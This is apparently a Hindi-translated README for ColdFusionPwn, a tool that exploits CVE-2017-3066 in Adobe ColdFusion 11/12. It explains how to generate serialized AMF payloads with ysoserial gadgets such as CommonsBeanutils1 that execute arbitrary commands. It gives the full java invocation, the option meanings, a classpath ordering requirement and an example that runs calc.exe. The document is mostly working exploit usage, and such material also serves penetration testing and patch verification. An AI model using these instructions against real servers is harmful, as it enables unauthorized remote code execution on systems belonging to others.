
CVE-2017-3066 के लिए शोषण उपकरण जो Adobe Coldfusion 11/12 को लक्षित करता है
CVE-2017-3066 के लिए शोषण उपकरण जो Adobe Coldfusion 11/12 को लक्षित करता है।
यह उपकरण आपको अनुमत वर्गों के इनपुट सत्यापन की कमी का शोषण करने के लिए क्रमबद्ध AMF-पेलोड उत्पन्न करने देता है। विवरण के लिए हमारा ब्लॉग पोस्ट देखें।
ysoserial का नवीनतम संस्करण प्राप्त करें। ColdFusionPwn को रिलीज़ से प्राप्त करें।
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
ColdFusionPwn-0.0.1-SNAPSHOT-all.jar को क्लासपाथ में पहली प्रविष्टि के रूप में रखना आवश्यक है, क्योंकि ysoserial के साथ आने वाली ApacheCommons BeanUtils लाइब्रेरी नई है (और इसका एक अलग सीरियलवर्जन यूआईडी है)।
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf